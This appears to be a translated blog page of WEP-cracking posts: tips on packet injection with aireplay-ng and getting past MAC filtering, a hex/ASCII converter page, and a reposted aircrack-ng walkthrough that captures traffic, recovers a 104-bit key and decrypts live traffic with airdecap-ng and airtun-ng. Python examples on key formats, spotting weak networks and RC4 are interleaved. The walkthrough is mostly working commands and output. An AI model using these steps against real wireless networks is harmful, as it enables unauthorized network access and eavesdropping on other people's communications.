In my experience, a 40-bit key is cracked with a data count of about 10,000, which takes 30 seconds at best and a minute at most,
and for a 128-bit WEP key, three minutes yields around 50,000 frames, so the WEP key gets cracked.

To sum up: if you monitor an AP that is exchanging data frequently, the data accumulates easily, but sometimes nobody is
connected to the AP at all.

In that case packet injection becomes all the more necessary, though it is part of the process you go through anyway to gather packets.
aireplay-ng -1 0 (and so on)...
(You're in luck if "success" appears, but MAC filtering has become more common these days, so once in a while it fails. Even so, there are
ways around that; two or three foreign-language documents will show you quickly.)


Once "success" appears, the data count that was not moving before starts going up one by one. That is when you have to bolt on the turbo booster.

aireplay-ng -3 (and so on)...
You have to wait a moment. It is not a matter of the user's skill: sometimes it kicks in quickly on its own, and when it takes long you wait about two minutes(?), then a list scrolls by and the data collection rate climbs as if a turbo booster had been attached.
The important point is to wait. >,.<

Then you crack the collected packets with aircrack-ng, and that is the end of it.

Or so you might think, and you would be wrong.
A penetration tester has to think about the step after that. (Honestly, the next step matters more. +0+)

Something comes out as a hex code. How are you going to use this key value?
Try decoding the hex of the cracked key. What do you get?

On Windows, no matter how you try to reach the AP with the hex key, if the key value is a hex code you will not get in.
So there will be some gloomy consultant writing "we cracked the key, but could not get in" in the
report for the client.

For that case there is an AP connection utility I recommend (Ralink Configuration Tool).
http://www.iptime.co.kr/~iptime/bbs/view.php?id=sw_download&page=24&ffid=&fsid=&dffid=&dfsid=&dftid=&sn1=&divpage=1&dis_comp=&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=1184
However, this applies only to the ipTIME G054U2 / G054UA models.
I have not tested any others.
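The problem described above (a recovered key is a string of hex bytes, and it can only be typed in as a passphrase if every byte happens to be printable) can be checked mechanically. The following is an added example, not code from the original post: it parses a key as aircrack-ng prints it, reports whether its length is a valid WEP size, and gives the ASCII passphrase form when one exists. The key strings used as input are the 104-bit key from the article reproduced further down and constructed samples.

```python
# Added example (not from the original post): classify a recovered WEP key string.
# Assumption: the key arrives as hex bytes, with or without ':' separators, as
# aircrack-ng prints it.  WEP keys are 5 bytes (40-bit) or 13 bytes (104-bit); a
# key can be typed as an ASCII passphrase only if every byte is printable.

import re

WEP_KEY_BYTES = {5: "40-bit (WEP-64)", 13: "104-bit (WEP-128)"}


def parse_hex_key(text):
    """Return the key bytes from 'B9:19:31' / 'b91931' style input, or raise ValueError."""
    cleaned = re.sub(r"[\s:\-]", "", text)
    if not cleaned or len(cleaned) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", cleaned):
        raise ValueError("not a hex byte string: %r" % text)
    return bytes.fromhex(cleaned)


def is_printable_ascii(data):
    """True if every byte is in 0x20..0x7E, the range a passphrase field accepts."""
    return all(0x20 <= b <= 0x7E for b in data)


def classify_wep_key(text):
    """Describe a key: its WEP size class and whether it has an ASCII passphrase form."""
    key = parse_hex_key(text)
    size = WEP_KEY_BYTES.get(len(key))      # None => not a valid WEP key length
    info = {
        "hex": key.hex(),
        "length_bytes": len(key),
        "wep_size": size,
        "ascii_form": key.decode("ascii") if is_printable_ascii(key) else None,
    }
    if size is None:
        info["note"] = "%d bytes is not a WEP key length (expected 5 or 13)" % len(key)
    elif info["ascii_form"] is None:
        info["note"] = ("contains non-printable bytes: enter it as %d hex digits, "
                        "not as a passphrase" % (2 * len(key)))
    else:
        info["note"] = "can be entered either as hex or as the ASCII passphrase"
    return info


if __name__ == "__main__":
    # Inputs: the key aircrack-ng prints in the article below, a constructed 40-bit
    # key that happens to be printable, and the converter page's sample text
    # (17 bytes, so not a WEP key at all).
    for sample in ("B9:19:31:8C:B2:61:DD:4E:FB:0B:AA:62:99",
                   "68656c6c6f",
                   "67:6f:64:20:62:6c:65:73:73:20:79:6f:75:21:20:3a:29"):
        print(classify_wep_key(sample))
```

The first sample contains bytes above 0x7E, which is exactly the case where a Windows passphrase field cannot take the key and it has to be entered as 26 hex digits.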

Let the needless hassle end with me -_ㅡ+

[Notice: anyone who uses this content maliciously bears the legal responsibility.]
Posted by bitfox

[Source] Can't remember..^^;

<html>
<head>
<title>Hex/Ascii Converter</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<script>

var symbols = " !\"#$%&'()*+,-./0123456789:;<=>?@";
var loAZ = "abcdefghijklmnopqrstuvwxyz";
symbols+= loAZ.toUpperCase();
symbols+= "[\\]^_`";
symbols+= loAZ;
symbols+= "{|}~";

function toAscii()
{
  // Read hex pairs (optionally ':'-separated) and map each byte to its printable character
  var valueStr = document.form1.hex.value.toLowerCase();
  var hex = "0123456789abcdef";
  var text = "";
  var i = 0;

  for ( i = 0; i < valueStr.length; i = i + 2 )
  {
    var char1 = valueStr.charAt(i);
    if ( char1 == ':' )
    {
      i++;
      char1 = valueStr.charAt(i);
    }
    var char2 = valueStr.charAt(i + 1);
    var num1 = hex.indexOf(char1);
    var num2 = hex.indexOf(char2);
    var ch = '?';                     // shown for invalid digits and non-printable bytes
    if ( num1 >= 0 && num2 >= 0 )
    {
      var value = (num1 << 4) | num2;
      var symbolIndex = value - 32;   // symbols starts at space (0x20)
      if ( symbolIndex >= 0 && value <= 126 )
      {
        ch = symbols.charAt(symbolIndex);
      }
    }
    text += ch;
  }

  document.form1.ascii.value = text;
  return false;   // stop the form from submitting
}

function toHex()
{
  var valueStr = document.form1.ascii.value;
  var hexChars = "0123456789abcdef";
  var text = "";
  var i = 0;
  for ( i = 0; i < valueStr.length; i++ )
  {
    var oneChar = valueStr.charAt(i);
    // Printable characters are looked up in the symbols table; anything else
    // (a newline, for instance) falls back to its own character code, masked to one byte
    var asciiValue = symbols.indexOf(oneChar);
    asciiValue = ( asciiValue >= 0 ) ? asciiValue + 32 : ( valueStr.charCodeAt(i) & 0xff );
    var index1 = asciiValue % 16;               // low nibble
    var index2 = (asciiValue - index1) / 16;    // high nibble
    if ( text != "" ) text += ":";
    text += hexChars.charAt(index2);
    text += hexChars.charAt(index1);
  }
  document.form1.hex.value = text;
  return false;   // stop the form from submitting
}


</script>


</head>

<body>

<p><font face="Geneva, Arial, Helvetica, sans-serif"><strong>Hex To ASCII Converter</strong></font></p>
<form name="form1" method="post" action="">
  <table width="78%" border="0" cellpadding="5" cellspacing="5">
    <tr>
      <td width="13%"><font size="-1" face="Geneva, Arial, Helvetica, sans-serif">Hex:
        </font></td>
      <td width="76%"><textarea name="hex" cols="80" rows="3" id="hex">67:6f:64:20:62:6c:65:73:73:20:79:6f:75:21:20:3a:29</textarea></td>
    </tr>
    <tr>
      <td><font size="-1" face="Geneva, Arial, Helvetica, sans-serif">Ascii:</font></td>
      <td><textarea name="ascii" cols="80" rows="3" id="ascii"></textarea></td>
    </tr>
  </table>
  <p>
    <input name="b1" type="submit" id="b13" value="Hex To ASCII" onClick="return toAscii();">
    <input name="b2" type="submit" id="b14" value="ASCII To Hex" onClick="return toHex();">
  </p>
  <p>&nbsp;</p>
</form>
<p>&nbsp;</p>
<p>&nbsp;</p>
</body>
</html>

Posted by bitfox

[Source] http://www.netexpertise.eu/en/linux/crack-wep-key-and-decrypt-live-traffic.html

Cracking a WEP key is extremely easy and takes only a matter of seconds. Truth? Pretty much… We are also going to decrypt traffic in real time, without even needing to connect to the wireless access point.

All steps are run as the root superuser, since the interface state needs to be changed.


To Start with

Download and install aircrack-ng. It's available in package form on most Linux distributions.
On Debian, run

apt-get install aircrack-ng

 
Aircrack provides tools to capture packets, crack the WEP key, and decrypt live traffic.

We'll run the tests with a Linksys PCMCIA wifi card. A simple ifconfig displays the card's network stats, which tells us it has been detected.

root@crack_WEP:~# ifconfig
lo        Interface doesn't support scanning.

wlan0     Link encap:Ethernet  HWaddr 00:1a:70:6b:37:4e
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:63 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3742 (3.7 KB)  TX bytes:10773 (10.7 KB)

 

Capture packets

The interface needs to be switched to monitor mode.

root@crack_WEP:~# airmon-ng
Interface	Chipset		Driver
wlan0		Broadcom 43xx	b43 - [phy0]

 
Airmon has detected interface wlan0. The name could of course differ, for instance ath0.

root@crack_WEP:~# airmon-ng stop wlan0
Interface	Chipset		Driver
wlan0		Broadcom 43xx	b43 - [phy0]
				(monitor mode disabled)

root@crack_WEP:~# airmon-ng start wlan0
Interface	Chipset		Driver
wlan0		Broadcom 43xx	b43 - [phy0]
				(monitor mode enabled on mon0)

 
Running iwconfig shows mon0 has been added in addition to the original interface wlan0:

root@crack_WEP:~# iwconfig
wlan0     IEEE 802.11bg  ESSID:""
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
          Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

 
We can now scan for available networks:

root@crack_WEP:~# airodump-ng mon0
 CH 10 ][ Elapsed: 4 s ][ 2009-08-08 18:01
 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:A0:C5:FF:84:72  197        4        0    0   1  11  WEP  WEP         private
 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 
The scan results show an access point transmitting on channel 1 with WEP encryption and MAC address 00:A0:C5:FF:84:72.
With the target defined, we now need to capture packets from the air.
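The same scan table is also what a defender uses to find networks that still run WEP or no encryption at all. The following is an added example (not part of the original article) that parses the fixed-width AP table airodump-ng prints and flags those networks. The sample scan is constructed: it reuses the WEP row above and adds a made-up WPA2 row and a made-up open row; the column handling reads the ENC and ESSID offsets from the header, so it is an assumption that airodump-ng keeps that header layout.

```python
# Added example (not part of the original article): turn an airodump-ng scan into
# an inventory and flag the access points a defender should worry about.
# Assumption: the input is the fixed-width AP table airodump-ng prints; the ENC
# and ESSID column offsets are read from the header line, so the plain scan and
# the --bssid variant (which adds an RXQ column) both parse.

import re

MAC_RE = re.compile(r"^\s*([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s")

# Constructed sample modelled on the scan above: the article's WEP network plus a
# made-up WPA2 network and a made-up open network, then the (ignored) client table.
SAMPLE_SCAN = """\
 CH 10 ][ Elapsed: 4 s ][ 2009-08-08 18:01
 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:A0:C5:FF:84:72  197        4        0    0   1  11  WEP  WEP         private
 00:11:22:33:44:55  120       10        2    0   6  54  WPA2 CCMP   PSK  office
 00:66:77:88:99:AA   80        3        0    0  11  54  OPN              guest
 BSSID              STATION            PWR   Rate  Lost  Packets  Probes
 00:A0:C5:FF:84:72  00:18:4D:76:30:EB  188  54-54     0    24795
"""


def parse_airodump(text):
    """Yield one dict per access-point row: bssid, channel, enc, cipher, auth, essid."""
    cols = None
    for line in text.splitlines():
        if "BSSID" in line and "ESSID" in line:
            # AP table header: remember where the ENC and ESSID columns start.
            cols = {name: line.index(name) for name in ("ENC", "ESSID")}
            continue
        if "STATION" in line:
            cols = None              # client table follows; not needed for the inventory
            continue
        m = MAC_RE.match(line)
        if cols is None or not m:
            continue
        numbers = line[:cols["ENC"]].split()               # bssid pwr [rxq] beacons data #/s ch mb
        security = line[cols["ENC"]:cols["ESSID"]].split() # enc [cipher] [auth]
        yield {
            "bssid": m.group(1).upper(),
            "channel": int(numbers[-2]),
            "enc": security[0],
            "cipher": security[1] if len(security) > 1 else "",
            "auth": security[2] if len(security) > 2 else "",
            "essid": line[cols["ESSID"]:].strip(),
        }


def weak_networks(text):
    """Return the APs a wireless audit should flag, following the article's advice
    to use at least WPA: anything still on WEP, and anything with no encryption."""
    findings = []
    for ap in parse_airodump(text):
        if ap["enc"] == "WEP":
            ap["finding"] = "WEP key recoverable from captured traffic; migrate to WPA2/WPA3"
        elif ap["enc"] == "OPN":
            ap["finding"] = "open network; traffic readable without any key"
        else:
            continue
        findings.append(ap)
    return findings


if __name__ == "__main__":
    for ap in weak_networks(SAMPLE_SCAN):
        print("%s  ch %2d  %-5s %-10s %s" % (ap["bssid"], ap["channel"], ap["enc"],
                                             ap["essid"], ap["finding"]))
```

Run it against a saved airodump-ng screen (or the text form of its `--write` output) to get the list of BSSIDs that need attention before anyone else finds them with the steps in this article.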

root@crack_WEP:~# airodump-ng --channel 1 --bssid 00:A0:C5:FF:84:72 --write temp wlan0

 CH  1 ][ Elapsed: 31 mins ][ 2009-05-02 21:52
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:A0:C5:FF:84:72  205  10     6058    24496    0   1  54  WEP  WEP         private
 BSSID              STATION            PWR   Rate  Lost  Packets  Probes
 00:A0:C5:FF:84:72  00:18:4D:76:30:EB  188  54-54     0    24795

 
Packets are captured into .cap files named with the temp prefix given to --write (temp-01.cap and so on).
As cracking techniques have become more efficient, there is a good chance of recovering a key from no more than 40000 packets with recent algorithms. Capture time varies with the amount of traffic on the link.
 

Crack the WEP key

It's now time to crack the WEP key:

root@crack_WEP:~# aircrack-ng -z -b 00:A0:C5:FF:84:72 temp.cap-0*.cap 

                                         Aircrack-ng 1.0 rc1

                         [00:00:22] Tested 240228 keys (got 41742 IVs)

   KB    depth   byte(vote)
    0    0/  1   B9(58880) A0(50688) 12(50176) F5(49920) 9E(48896) CD(48640)
    1    0/  1   19(54784) E8(52480) FA(52480) 4B(51456) 79(51456) DD(49664)
    2    0/  1   31(59648) EA(53504) 40(50688) 0A(50432) 88(50432) 0E(50176)
    3    0/  1   8C(60416) 05(49152) 56(49152) 23(48640) 52(48384) 03(48128)
    4    0/  1   B2(59136) AE(49664) 78(49152) FE(49152) 8B(48384) 9C(47616)
    5    0/  1   61(53504) E6(50688) FF(50176) 13(49664) 23(49408) C7(49408)
    6    0/  1   DD(56320) C4(51968) 90(50688) 0C(50176) CF(49920) CE(49152)
    7    0/  1   4E(53248) E6(51968) 7D(49152) 0B(48896) 90(48896) 06(48640)
    8    0/  1   FB(52224) C1(49664) E9(48128) 3D(47616) F0(47360) EB(47104)
    9    0/  1   0B(54784) BC(51712) 52(50432) 54(49920) F5(49920) CA(48896)
   10    0/  1   E6(50944) 1C(49920) 5F(49408) 1F(49152) 0A(48896) 83(48896)
   11    2/  1   FF(49664) 17(48384) 94(48128) 27(47872) 23(47616) B2(47616)
   12    0/  4   91(50452) A4(50360) 77(50156) 78(49540) FF(49476) 70(48788) 

             KEY FOUND! [ B9:19:31:8C:B2:61:DD:4E:FB:0B:AA:62:99 ]
	Decrypted correctly: 100%

 
That’s right, the key was cracked in 22 seconds!
 

Decrypt the traffic

The traffic can be captured into .cap files as above and decrypted into a second file, which can then be handed to tcpdump, for instance:

root@crack_WEP:~# airdecap-ng -w b919318cb261dd4efb0baa6299 temp-01.cap
Total number of packets read         22072
Total number of WEP data packets      6245
Total number of WPA data packets         0
Number of plaintext data packets         3
Number of decrypted WEP  packets      6245
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets         0

root@crack_WEP:~# tcpdump -r temp-01-dec.cap -i wlan

 
But it is also possible to decrypt live traffic in real time and send it to a virtual interface, at0, which we can listen on like any real interface. Airtun-ng, provided in the Aircrack package, can do this.

root@crack_WEP:~# airtun-ng -a 00:A0:C5:FF:84:72 -w b919318cb261dd4efb0baa6299 mon0
created tap interface at0
WEP encryption specified. Sending and receiving frames through mon0.
FromDS bit set in all frames.

 
From another shell:

crack_WEP:~# tcpdump -i at0
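What airdecap-ng and airtun-ng do with the recovered key is small enough to write out, and doing so shows why the protocol is beyond repair. The following is an added example, not code from the original article or from the aircrack-ng project: it implements RC4, builds a WEP frame body from a constructed payload, decrypts it with the key aircrack-ng printed above and verifies the CRC-32 integrity check value. The last function demonstrates the property that makes the 24-bit IV fatal: two frames encrypted under the same IV share a keystream, so the XOR of their ciphertexts equals the XOR of their plaintexts.

```python
# Added example (not part of the original article): the operation airdecap-ng and
# airtun-ng perform once the key is known, reduced to its essentials so the
# weakness is visible.  WEP seeds RC4 with the 3-byte IV (sent in clear) followed
# by the 5- or 13-byte key, and XORs the keystream over the payload plus a
# CRC-32 integrity check value (ICV).
# Assumption: the frame bodies here are constructed, not captured; the key is the
# one aircrack-ng printed above.

import struct
import zlib

WEP_KEY = bytes.fromhex("b919318cb261dd4efb0baa6299")   # 104-bit key from the article


def rc4(key, data):
    """Plain RC4: key scheduling, then XOR the generated keystream over data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext):
    """WEP integrity check value: CRC-32 of the payload, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key, iv, key_id, plaintext):
    """Build a WEP frame body: IV(3) | key-id byte | RC4(IV || key)(plaintext | ICV)."""
    return iv + bytes([(key_id & 3) << 6]) + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key, body):
    """Return (plaintext, icv_ok): strip the IV, regenerate the keystream, check the ICV."""
    iv, ciphertext = body[:3], body[4:]
    clear = rc4(iv + key, ciphertext)
    plaintext = clear[:-4]
    return plaintext, clear[-4:] == icv(plaintext)


def iv_reuse_leaks_xor(key, iv, p1, p2):
    """Two frames under the same IV share a keystream, so c1 XOR c2 == p1 XOR p2
    is recoverable without the key.  With only 2^24 IVs this is why WEP is unsound
    whatever the key length, and why the article's advice is to move to WPA."""
    c1 = wep_encrypt(key, iv, 0, p1)[4:]
    c2 = wep_encrypt(key, iv, 0, p2)[4:]
    n = min(len(p1), len(p2))
    xor_c = bytes(a ^ b for a, b in zip(c1[:n], c2[:n]))
    xor_p = bytes(a ^ b for a, b in zip(p1[:n], p2[:n]))
    return xor_c == xor_p


if __name__ == "__main__":
    frame = wep_encrypt(WEP_KEY, bytes.fromhex("0a0b0c"), 0, b"constructed payload")
    print("frame body:", frame.hex())
    print("decrypted :", wep_decrypt(WEP_KEY, frame))
    print("same IV leaks plaintext XOR:",
          iv_reuse_leaks_xor(WEP_KEY, b"\x01\x02\x03", b"alpha", b"bravo"))
```

Note that the ICV is a plain CRC-32 with no key involved, so it detects transmission errors but gives no integrity protection; a wrong key shows up as an ICV mismatch, which is the "Number of corrupted WEP packets" counter in the airdecap-ng output above.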

 

Conclusion

It is indeed very easy to crack a WEP key and listen to the traffic without associating with the access point, and hence without being detected. Make sure to use at least WPA with non-dictionary passwords.

Posted by bitfox